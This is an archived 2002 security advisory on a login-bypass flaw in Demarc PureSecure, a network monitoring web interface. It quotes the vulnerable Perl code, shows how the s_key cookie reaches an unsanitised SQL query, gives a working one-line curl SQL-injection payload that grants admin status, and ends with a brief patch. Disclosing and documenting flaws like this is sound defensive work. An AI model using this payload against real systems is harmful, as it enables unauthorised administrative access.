Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: web5293.htm

Demarc PureSecure login bypass



19th Apr 2002 [SBWID-5293]
COMMAND

	Demarc PureSecure login bypass

SYSTEMS AFFECTED

	all versions ?

PROBLEM

	pokleyzz sakamaniaka says :
	

	Demarc PureSecure (http://www.demarc.org) is  an  all-inclusive  network
	monitoring solution that allows you to  monitor  an  entire  network  of
	servers from one powerful web interface.
	

	user can bypass login and get admin  status  by  sql  injection  through
	cookies s_key
	

	

	--------- line 319 ------------------------------

	elsif (($cookies{\'s_key\'}) && ($cookies{\'s_key\'}-

	>value)){

		$logged_in_as = &check_login($cookies

	{\'s_key\'}->value);

		if (!$logged_in_as){

			   &print_login_screen;

	   		&safe_exit;

		}

	-----------------------------------------------------

	

	

	s_key  = will be use for sql in fuction check_login query ( line 6114)
	

	

	---------lini 6114---------------------------------

	$sql_query = \"	SELECT \\

						

		f1,f2,f3,admin,username,UNIX_TIMESTAMP

	(current_login_timedate) AS LOGINTIME \\

					

		FROM \\

						

		dm_sessions \\

					

		WHERE current_session_id = \'$session_id\' \";

	-----------------------------------------------------

	

	

	

	 Exploit 

	 =======

	

	using curl :
	

	curl -b s_key=\\\'%20OR%20current_session_id%20like%20\\\'%\\\'%23 https://<lame host>/dm/demarc

	

	

SOLUTION

	Patch as follow :
	

	

	line 6113: &safe_slash(\\$session_id\' );

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH